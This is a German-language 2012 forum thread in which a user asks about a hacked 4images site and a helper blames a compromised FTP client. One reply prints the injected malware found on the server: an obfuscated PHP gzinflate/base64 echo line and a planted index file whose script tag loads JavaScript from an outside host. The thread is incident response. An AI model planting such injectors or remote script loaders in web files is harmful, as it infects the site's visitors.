Author Topic: Seite gehackt ? HTML:Script-inf (Engine B)  (Read 10708 times)

0 Members and 1 Guest are viewing this topic.

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Seite gehackt ? HTML:Script-inf (Engine B)
« on: March 26, 2012, 06:23:00 PM »
Hallo zusammen,
ein Freund von mir nutzt das 4images für seine Seite.
Und dieses schon 2-3 Jahre.
Nun bekommt er plötzlich an seinem PC mit GData folgende Meldung:

Website gesperrt!
G Data InternetSecurity 2012 hat den Zugriff auf diese Webseite verweigert.
Die Seite enthält infizierten Code: HTML:Script-inf (Engine B).

Von anderen PCs (es wurden 4 getestet) ist ein Zugriff auf die Seite möglich.
Kann es sein das die Seite gehackt wurde udn wie kann er das feststellen ?
Bin für jede Hilfe dankbar.

Gruss
Musicsurfer

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #1 on: March 26, 2012, 07:44:09 PM »
Wie sollen wir dir Helfen wenn du nicht einmal einmal einen Link zu dieser Webseite einstellst.

mfg Andi

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #2 on: March 26, 2012, 07:55:02 PM »
Hi rembrandt,
da es sich nicht um meine Seite handelt, habe ich die URL nur per PN weitergegeben.
Sorry, das hätte ich dabeischreiben sollen.
Ich habe in der Zwischezit die gesicherten PHP-Dateien wieder auf den Server gespielt und nun geht es wieder.
In fast allen Ordnern waren HEADER und FOOTER, sowie INDEX-Dateien verändert :(

Gruss
Musicsurfer

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #3 on: March 26, 2012, 09:59:11 PM »
dein Bekannter sollte schleunigst sein ftp Passwort ändern, b.z.w. seinen PC auf Trojaner e.t.c. untersuchen,
 sonst kann es passieren das trotz geänderten Passwort die Dateien am FTP wieder geändert werden.

mfg Andi

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #4 on: March 27, 2012, 10:07:22 PM »
Hallo,

sein (und mein PC) wurde mit Malwarebytes getestet und ohne Fehler.

Bei dem Server waren die Footer, Header und indexes um folgendes ergänzt:
Code: [Select]
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#

Ebenso befanden sich in einigen Ordnern index-Files, die dort nicht hingehören.
Eines habe ich mir mal angesehen:
Code: [Select]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD><!--b58b6f--><script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js"></script><!--/b58b6f-->

<TITLE></TITLE>
<META http-equiv=Refresh Content="0; Url=../../">
</HEAD>
</HTML>

FTP-Passwörter wurden geändert.

Gruss
Musicsurfer

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #5 on: March 27, 2012, 10:10:51 PM »
ja das kenne ich, die veränderten Files wurden/werden immer mit dem FTP programm des Users hochgeladen.
wenn es wieder passiert wäre es besser das FTP programm zu wechseln.

mfg Andi

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #6 on: March 27, 2012, 10:13:02 PM »
Hi Rembarndt,
heißt das das jemand anderes die Files hochgeladen hat oder ich als ich das FTP-Programm gestartet habe ?

GRuss

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #7 on: March 27, 2012, 11:07:55 PM »
das ftp programm ist verseucht, darum nutzt es dir nichts wenn du das FTP Server Passwort änderst.

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #8 on: March 27, 2012, 11:41:15 PM »
Also ich habe mein Filezilla jetzt gegen SmartFTP eingetauscht.
Oder hast du eine Empfehlung für mich, welches FTP-Programm man nutzen kann ?

Das Änderungsdatum der Files ist komischerweise zu der Zeit, wenn der Server das tägliche Backup macht ....
Allerdings war die Änderung am 23.3., und danach waren ja noch 2-3 tägliche Backups.
Egal, ich habe mein FTP-Programm jetzt getauscht und mein System gescannt.

Gruss
Musicsurfer

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #9 on: March 28, 2012, 07:54:35 AM »
ein frage noch, hast du "WordPress" auch oben?
Zur Zeit scheint der Trojaner ganz aktuell zu sein, wenn du in google als suchbegriff den webseiten link  eingibst, sieht du welche seite alle infiziert sind. :)

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #10 on: March 28, 2012, 09:00:51 AM »
Hi Rembrandt,
WordpRess habe ich nicht auf dem Server.
Und wenn ich die URL bei Google eingebe erscheinen jetzt zumindest keine ungewöhnlichen Suchergebnisse.

Gruss
Musicsurfer

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #11 on: March 28, 2012, 11:26:28 AM »
ich wollte den link nicht rein kopieren, das "h**p://organicfoodmarkets.com.au/release.js" in das google suchfeld, ohne sterne.
Dann siehst du die betroffenen Webseiten.

mfg Andi

Offline musicsurfer

  • Full Member
  • ***
  • Posts: 184
    • View Profile
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #12 on: March 29, 2012, 07:03:39 AM »
Wow
Ich bin beeindruckt  8O

Kannst du mir denn ein FTP-Progrmam empfehlen, welches die Passswörter nicht speichert ?
Von Filezilla bin ich auf jeden Fall weg und bei FlashFTP bekomme ich die gespeicherten Passwörter nicht weg.
Welches würdest du denn empfehlen ?

Gruss
Musicsurfer

Rembrandt

  • Guest
Re: Seite gehackt ? HTML:Script-inf (Engine B)
« Reply #13 on: March 29, 2012, 05:03:54 PM »
weiß ich leider jetzt keines, ich selber verwende auch flashfpx.

mfg Andi